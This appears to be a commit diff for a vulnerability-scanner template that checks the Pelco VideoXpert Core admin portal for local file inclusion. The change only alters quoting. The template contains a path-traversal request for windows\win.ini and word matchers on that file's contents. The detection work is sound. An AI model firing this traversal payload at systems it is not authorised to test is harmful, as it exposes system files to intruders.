Update schneider-electric-pelco-videoxpert-core-admin-portal-lfi.yaml
parent
2a268f1324
commit
b4824aba94
|
@ -10,14 +10,14 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/portal//..\\\..\\\..\\\..\\\windows\win.ini"
|
||||
- '{{BaseURL}}/portal//..\\\..\\\..\\\..\\\windows\win.ini'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "bit app support"
|
||||
- "fonts"
|
||||
- "extensions"
|
||||
- 'bit app support'
|
||||
- 'fonts'
|
||||
- 'extensions'
|
||||
condition: and
|
||||
part: body
|
||||
|
|
Loading…
Reference in New Issue